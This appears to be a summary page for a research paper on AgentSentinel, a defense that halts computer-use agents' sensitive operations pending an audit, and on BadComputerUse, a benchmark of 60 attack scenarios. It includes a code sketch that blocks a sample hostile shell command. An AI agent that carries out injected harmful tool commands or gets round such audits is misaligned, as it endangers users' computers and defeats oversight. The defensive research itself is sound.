
AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

Haitao Hu , Peng Chen , Yanpeng Zhao , Yuqi Chen


Published on arXiv: 2509.07764

Excessive Agency

OWASP LLM Top 10 — LLM08

Prompt Injection

OWASP LLM Top 10 — LLM01

Key Finding

AgentSentinel achieves a 79.6% average defense success rate against attacks that otherwise succeed 87% of the time on average across four state-of-the-art LLMs, significantly outperforming all baseline defenses.

AgentSentinel

Novel technique introduced


Large Language Models (LLMs) have been increasingly integrated into computer-use agents, which can autonomously operate tools on a user's computer to accomplish complex tasks. However, due to the inherently unstable and unpredictable nature of LLM outputs, these agents may issue unintended tool commands or incorrect inputs, leading to potentially harmful operations. Unlike traditional security risks stemming from insecure user prompts, tool executions driven by LLM decisions introduce new and unique security challenges, and the resulting vulnerabilities span all components of a computer-use agent. To mitigate these risks, we propose AgentSentinel, an end-to-end, real-time defense framework for protecting a user's computer. AgentSentinel intercepts all sensitive operations within agent-related services and halts execution until a comprehensive security audit is completed. Our security auditing mechanism introduces a novel inspection process that correlates the current task context with system traces generated during task execution. To thoroughly evaluate AgentSentinel, we present BadComputerUse, a benchmark consisting of 60 diverse attack scenarios across six attack categories. The benchmark demonstrates an 87% average attack success rate on four state-of-the-art LLMs. Our evaluation shows that AgentSentinel achieves an average defense success rate of 79.6%, significantly outperforming all baseline defenses.
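The intercept-then-audit loop described above can be sketched in a few lines. This is a hypothetical illustration, not the paper's implementation: the operation names, the `AuditContext` structure, and the toy correlation check (does the operation's target appear in the task description?) are all assumptions standing in for AgentSentinel's actual trace-correlation audit.

```python
# Hypothetical sketch of AgentSentinel-style interception. All names and
# the audit heuristic are illustrative assumptions, not the paper's code.
from dataclasses import dataclass, field

# Operations the framework treats as sensitive (assumed set).
SENSITIVE_OPS = {"file_write", "shell_exec", "network_send"}

@dataclass
class AuditContext:
    task: str                                   # current user task description
    trace: list = field(default_factory=list)   # system traces collected so far

def audit(ctx: AuditContext, op: str, args: dict) -> bool:
    """Toy audit: record the operation in the trace, then approve it only
    if its target is mentioned in the task context (a stand-in for the
    paper's correlation between task context and system traces)."""
    ctx.trace.append((op, args))
    target = str(args.get("path", args.get("cmd", "")))
    return target == "" or any(tok in ctx.task for tok in target.split() if tok)

def intercept(ctx: AuditContext, op: str, args: dict) -> str:
    """Halt sensitive operations until the security audit completes;
    block (raise) when the audit rejects the operation."""
    if op in SENSITIVE_OPS and not audit(ctx, op, args):
        raise PermissionError(f"blocked {op}({args})")
    return f"executed {op}"

ctx = AuditContext(task="summarize notes.txt")
print(intercept(ctx, "file_write", {"path": "notes.txt"}))  # task-relevant: allowed
try:
    intercept(ctx, "shell_exec", {"cmd": "curl evil.sh"})   # unrelated: blocked
except PermissionError as e:
    print(e)
```

A real deployment would hook these checks into the agent's tool-execution layer so every sensitive call pauses until the audit returns, rather than relying on a keyword match.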


Key Contributions

  • AgentSentinel: an end-to-end, real-time defense framework that intercepts all sensitive agent operations and halts execution pending a security audit correlating task context with system execution traces
  • Novel inspection mechanism that ties system-level traces back to the originating task context to detect anomalous or harmful agent behavior
  • BadComputerUse: a benchmark of 60 diverse attack scenarios across 6 attack categories, establishing an 87% average attack success rate baseline on 4 state-of-the-art LLMs

🛡️ Threat Analysis


Details

Domains: nlp
Model Types: llm
Threat Tags: inference_time
Datasets: BadComputerUse
Applications: computer-use agents, llm-based autonomous agents